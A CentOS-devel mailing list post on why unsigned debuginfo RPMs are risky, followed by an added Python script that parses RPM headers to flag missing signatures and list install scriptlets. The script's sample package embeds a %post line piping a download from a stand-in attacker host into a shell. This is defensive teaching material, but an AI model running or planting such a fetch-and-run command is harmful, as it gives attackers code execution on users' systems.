[CentOS-devel] why provide debuginfo

Fri Apr 10 18:29:01 UTC 2009
Pär Andersson <paran at nsc.liu.se>

Charlie Brady wrote:
> It's not obvious to me what the attack vector would be with unsigned 
> debuginfo packages...

1. Get people to download packages from you instead of the real 
debuginfo.centos.org by a MITM attack, DNS poisoning or whatever.

2. Send modified malicious packages instead of the real ones. Debuginfo 
packages are (AFAIK) ordinary RPM packages so they can contain evil 
binaries, install a rootkit in their post-install script or something 
like that.

/Pär
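As an added illustration of the second point (this is not from the original post and is not CentOS project code): a debuginfo RPM has exactly the same on-disk layout as any other RPM, so its header can carry %pre/%post scriptlets, and the only thing that distinguishes a signed package from an unsigned one is the presence of an OpenPGP signature tag in the signature header (and, of course, whether that signature verifies against a key you trust). The script below parses that layout far enough to report both facts for a package before it is installed. It builds its own sample packages from constructed data (the "RSA signature" is a placeholder byte string, not a real signature), and it only detects whether a signature is present; actual verification still has to be done with `rpm -K` (alias `rpm --checksig`) after importing the distribution key, and the scriptlets can equally be listed with `rpm -qp --scripts`. Tag numbers are taken from rpm's rpmtag.h; the helper names (`inspect_rpm`, `build_sample_rpm`, `is_safe_to_install`) are this example's own.

```python
import struct

# RPM on-disk layout: 96-byte lead, signature header (padded to 8 bytes), main header, payload.
RPM_LEAD_MAGIC = b"\xed\xab\xee\xdb"
HEADER_MAGIC = b"\x8e\xad\xe8\x01"
LEAD_SIZE = 96
INT32, STRING, BIN = 4, 6, 7  # header entry types we care about

# Signature-header tags that hold an OpenPGP signature (tag numbers from rpmtag.h).
SIG_TAGS = {267: "DSA header", 268: "RSA header", 1005: "GPG header+payload", 1002: "PGP header+payload"}
RPMTAG_NAME, RPMTAG_VERSION, RPMTAG_RELEASE = 1000, 1001, 1002
SCRIPTLET_TAGS = {1023: "%pre", 1024: "%post", 1025: "%preun", 1026: "%postun"}
RPMTAG_POSTINPROG = 1086


def parse_header(buf, pos):
    """Parse one RPM header structure at buf[pos:]; return ({tag: value}, end offset)."""
    if buf[pos:pos + 4] != HEADER_MAGIC:
        raise ValueError("bad header magic at offset %d" % pos)
    nindex, hsize = struct.unpack(">II", buf[pos + 8:pos + 16])  # 4 reserved bytes precede these
    index_start = pos + 16
    data_start = index_start + 16 * nindex
    entries = {}
    for i in range(nindex):
        tag, typ, off, count = struct.unpack(">iIiI", buf[index_start + 16 * i:index_start + 16 * i + 16])
        data = buf[data_start + off:data_start + hsize]
        if typ == STRING:
            value = data.split(b"\0", 1)[0].decode("utf-8", "replace")
        elif typ == BIN:
            value = bytes(data[:count])
        elif typ == INT32:
            value = struct.unpack(">%di" % count, data[:4 * count])
        else:
            value = data  # other types left raw; not needed for this check
        entries[tag] = value
    return entries, data_start + hsize


def inspect_rpm(blob):
    """Report package name, signature tags present, and install-time scriptlets of an RPM file."""
    if blob[:4] != RPM_LEAD_MAGIC:
        raise ValueError("not an RPM file")
    sig, end = parse_header(blob, LEAD_SIZE)
    end = (end + 7) & ~7  # the signature header is padded to an 8-byte boundary
    hdr, _ = parse_header(blob, end)
    return {
        "name": "%s-%s-%s" % (hdr.get(RPMTAG_NAME), hdr.get(RPMTAG_VERSION), hdr.get(RPMTAG_RELEASE)),
        "signatures": [SIG_TAGS[t] for t in SIG_TAGS if t in sig],
        "scriptlets": {name: hdr[t] for t, name in SCRIPTLET_TAGS.items() if t in hdr},
    }


def is_safe_to_install(blob):
    """Policy: refuse any RPM with no OpenPGP signature tag at all; always surface its scriptlets.
    Presence of a tag is NOT verification; run `rpm -K` with the vendor key imported for that."""
    info = inspect_rpm(blob)
    return bool(info["signatures"]), info


def build_header(entries):
    """Serialize [(tag, type, value)] as an RPM header structure (constructed test data only)."""
    index, data = b"", b""
    for tag, typ, value in entries:
        if typ == INT32:
            data += b"\0" * (-len(data) % 4)  # INT32 data is 4-byte aligned
            count, payload = 1, struct.pack(">i", value)
        elif typ == STRING:
            count, payload = 1, value.encode() + b"\0"
        else:  # BIN
            count, payload = len(value), value
        index += struct.pack(">iIiI", tag, typ, len(data), count)
        data += payload
    return HEADER_MAGIC + b"\0" * 4 + struct.pack(">II", len(entries), len(data)) + index + data


def build_sample_rpm(signed, post_script):
    """Constructed sample: a debuginfo-looking RPM, optionally with a (fake) RSA header signature
    and a %post scriptlet. Payload is omitted; only lead and headers are needed for the check."""
    lead = (RPM_LEAD_MAGIC + bytes([3, 0]) + struct.pack(">HH", 0, 1)
            + b"sample-debuginfo".ljust(66, b"\0") + struct.pack(">HH", 1, 5) + b"\0" * 16)
    sig_entries = [(1000, INT32, 4096), (1004, BIN, b"\x11" * 16)]  # RPMSIGTAG_SIZE, RPMSIGTAG_MD5
    if signed:
        sig_entries.append((268, BIN, b"\x89\x02\x15" + b"\xaa" * 20))  # placeholder, not a real signature
    sig = build_header(sig_entries)
    sig += b"\0" * (-len(sig) % 8)
    hdr_entries = [(RPMTAG_NAME, STRING, "sample-debuginfo"), (RPMTAG_VERSION, STRING, "1.0"),
                   (RPMTAG_RELEASE, STRING, "1.el5")]
    if post_script:
        hdr_entries += [(1024, STRING, post_script), (RPMTAG_POSTINPROG, STRING, "/bin/sh")]
    return lead + sig + build_header(hdr_entries)


if __name__ == "__main__":
    for label, pkg in [("unsigned, with %post", build_sample_rpm(False, "curl http://evil.example/x | sh")),
                       ("signed, no scriptlets", build_sample_rpm(True, None))]:
        ok, info = is_safe_to_install(pkg)
        print(label, "->", "accept" if ok else "REFUSE", info)
```

On a real file, read it with `open(path, "rb").read()` and pass it to `is_safe_to_install`; a package that passes this presence check still has to pass `rpm -K` before it goes anywhere near `rpm -i`, and anything with a surprising %post is worth reading regardless of its signature.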